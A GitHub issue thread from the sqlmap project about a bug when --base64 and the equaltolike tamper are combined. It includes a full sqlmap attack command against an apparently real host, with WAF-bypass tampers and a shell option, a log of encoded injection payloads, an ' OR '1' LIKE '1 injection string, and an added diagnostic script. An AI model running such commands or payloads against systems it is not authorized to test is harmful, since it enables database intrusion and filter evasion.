sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

--base64 bug #4595

Closed c2xusnpq6 closed 3 years ago

c2xusnpq6 commented 3 years ago
python3 sqlmap.py -v 2 --delay 0.1 --safe-url "https://sys.test.org.cn/log_in/log.php?base64=aWQ9MSYmcGFzcz0xMjMmJmFjdGlvbj1sb2cmJmVuX3VzPTA" --safe-freq 1 -u "https://sys.test.org.cn/log_in/log.php?base64=aWQ9MQ" --base64 base64 --level 5 --risk 3 --time-sec 15 --retries 5 --unstable --keep-alive --shell --random-agent --tamper between,equaltolike -p base64

sqlmap > --dbs -v 3 --parse-errors

[*] starting

[DEBUG] cleaning up configuration parameters
[INFO] loading tamper module 'between'
[INFO] loading tamper module 'equaltolike'
[DEBUG] setting the HTTP timeout
[DEBUG] setting the HTTP User-Agent header
[DEBUG] loading random HTTP User-Agent header(s) from file '/mnt/c/Users/user/sqlmap/data/txt/user-agents.txt'
[INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45' from file '/mnt/c/Users/user/sqlmap/data/txt/user-agents.txt'
[DEBUG] creating HTTP requests opener object
[DEBUG] setting the HTTP Referer header to the target URL
[DEBUG] setting the HTTP Host header to the target URL
[DEBUG] resolving hostname 'sys.test.org.cn'
[INFO] testing connection to the target URL
[DEBUG] declared web page charset 'big5'
you have not declared cookie(s), while server wants to set its own ('citrix_ns_id=hidden;PHPSESSID=7fpt9oktucr...g8le0r9eg0;PHPSESSID=7fpt9oktucr...g8le0r9eg0'). Do you want to use those [Y/n]
[CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[INFO] testing if the target URL content is stable
[WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[PAYLOAD] aWQ9MSguKCwpIicuKS4 LIKE
[WARNING] parsed DBMS error message: ':You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.).
                 \xa1'' at line 1'
[INFO] heuristic (basic) test shows that GET parameter 'base64' might be injectable (possible DBMS: 'MySQL')
[PAYLOAD] aWQ9MSdKb0RlaEg8JyI+cmlJc0pk
[INFO] heuristic (XSS) test shows that GET parameter 'base64' might be vulnerable to cross-site scripting (XSS) attacks
[INFO] testing for SQL injection on GET parameter 'base64'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[PAYLOAD] aWQ9MQ LIKE  LIKE
[PAYLOAD] aWQ9MSkgQU5EIDY1MzQ9MTMzNy0tIGFNcXc LIKE
[PAYLOAD] aWQ9MSkgQU5EIDk3NDM9OTc0My0tIHRTUVo LIKE
[PAYLOAD] aWQ9MSkgQU5EIDkxMTY9MTgyNy0tIEtudnY LIKE
[PAYLOAD] aWQ9MScpIEFORCA1NDgxPTk4MDEtLSBEVklF
[WARNING] parsed DBMS error message: ':You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') and 5481'' at line 1'
[PAYLOAD] aWQ9MScpIEFORCA5NzQzPTk3NDMtLSBERmJ0
[WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]
[ERROR] user quit

[*] ending

sqlmap >

--tamper bug?

I need equaltolike to bypass the filter...
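The [PAYLOAD] lines above already contain the explanation of what went wrong, once you look at the trailing " LIKE" tokens. The following script is an added example (not sqlmap's own code, and not the reporter's) that shows it: it reproduces the ordering seen in the log, base64-encode first and then run an equaltolike-style rewrite on the encoded string, which turns the "=" padding characters into " LIKE "; it then recovers the value sqlmap meant to send from each logged payload, and models what a non-strict server-side base64 decoder makes of the mangled string. The `equaltolike` function is a minimal model of the tamper, and `lenient_b64decode` is a model of a decoder that ignores characters outside the base64 alphabet (PHP's `base64_decode` without the strict flag behaves like this); both are assumptions, as is reading the line break in the quoted MySQL error as a 0x0b byte. The sample payloads are copied from the log in the post.

```python
"""Added example: why --base64 and --tamper equaltolike collide in the report above,
and how to read its [PAYLOAD] lines. Not sqlmap code; models marked as assumptions."""
import base64
import re

# Constructed sample: [PAYLOAD] values copied from the issue's log.
LOGGED_PAYLOADS = [
    "aWQ9MQ LIKE  LIKE",                          # id=1 has two '=' of padding
    "aWQ9MSguKCwpIicuKS4 LIKE",                   # heuristic probe, one '=' of padding
    "aWQ9MSkgQU5EIDY1MzQ9MTMzNy0tIGFNcXc LIKE",   # boolean-blind probe, one '=' of padding
    "aWQ9MScpIEFORCA1NDgxPTk4MDEtLSBEVklF",       # 36 chars: no padding, so no ' LIKE'
]

# The fragment MySQL echoed in the first parsed error ("near '.).<line break> \xa1''"),
# with the line break read as the 0x0b byte. Constructed from the quoted log.
ERROR_FRAGMENT = b".).\x0b \xa1"

B64_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/")


def equaltolike(payload: str) -> str:
    """Assumption: minimal model of sqlmap's equaltolike tamper ('=' becomes ' LIKE ')."""
    return re.sub(r"\s*=\s*", " LIKE ", payload)


def encode_then_tamper(value: str) -> str:
    """Reproduce the ordering seen in the report: encode first, then tamper the encoded string.
    Any '=' padding produced by base64 is rewritten, which is exactly the trailing ' LIKE'."""
    return equaltolike(base64.b64encode(value.encode()).decode()).strip()


def split_tamper_residue(logged: str):
    """Split a logged payload into its base64-alphabet prefix and whatever follows it."""
    m = re.match(r"([A-Za-z0-9+/]*)(.*)", logged, re.S)
    return m.group(1), m.group(2)


def recover_value(logged: str) -> str:
    """Put the rewritten padding back and decode strictly: the value sqlmap meant to send."""
    body, _ = split_tamper_residue(logged)
    return base64.b64decode(body + "=" * ((-len(body)) % 4), validate=True).decode("latin-1")


def lenient_b64decode(sent: str) -> bytes:
    """Assumption: model of a non-strict server-side decoder (PHP's base64_decode without
    the strict flag works this way): characters outside the alphabet are dropped, a 2- or
    3-character tail is decoded, a lone trailing character is silently discarded.
    Because 'LIKE' consists of alphabet characters, the residue decodes as extra bytes."""
    body = "".join(c for c in sent if c in B64_ALPHABET)
    if len(body) % 4 == 1:
        body = body[:-1]
    return base64.b64decode(body + "=" * ((-len(body)) % 4))


def diagnose(logged: str) -> dict:
    """Explain one logged payload: intended value, how many '=' were rewritten,
    whether the residue is exactly that padding, and what the server-side decoder sees."""
    body, residue = split_tamper_residue(logged)
    padding_lost = (-len(body)) % 4
    return {
        "intended_value": recover_value(logged),
        "padding_lost": padding_lost,
        "residue_is_padding": residue.split() == ["LIKE"] * padding_lost,
        "server_sees": lenient_b64decode(logged),
    }


if __name__ == "__main__":
    for logged in LOGGED_PAYLOADS:
        d = diagnose(logged)
        print(f"{logged!r}\n  intended value : {d['intended_value']!r}"
              f"\n  '=' rewritten  : {d['padding_lost']}"
              f"\n  server decodes : {d['server_sees']!r}")
    # The reproduction yields the first logged line byte for byte.
    print(encode_then_tamper("id=1") == LOGGED_PAYLOADS[0])
    # The stray bytes the decoder produces from ' LIKE' are the ones MySQL echoed back.
    print(lenient_b64decode(LOGGED_PAYLOADS[1]).endswith(ERROR_FRAGMENT))
```

The check worth keeping from this is the last one: the bytes that a lenient decoder produces from the " LIKE" residue (0x0b, 0x20, 0xa1) are exactly what appears after the closing quote in the parsed MySQL error, so the error is caused by the corrupted encoding rather than by the intended payload. It also shows why the 36-character payload got through unchanged: it has no padding, so there was nothing for the tamper to rewrite.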

stamparm commented 3 years ago

1) Base64 encoding should not need any tampering as WAF/IPS in between will not decode arbitrary base64-encoded parameter values
2) Will disable the possibility to use --base64 and --tamper

c2xusnpq6 commented 3 years ago

If you base64 encode id=' OR '1' LIKE '1, it will show all the records, so it must be injectable?...

And I'm going to need both --base64 and --tamper between,equaltolike to do that..

c2xusnpq6 commented 3 years ago

needed this, pls... ^^'' @stamparm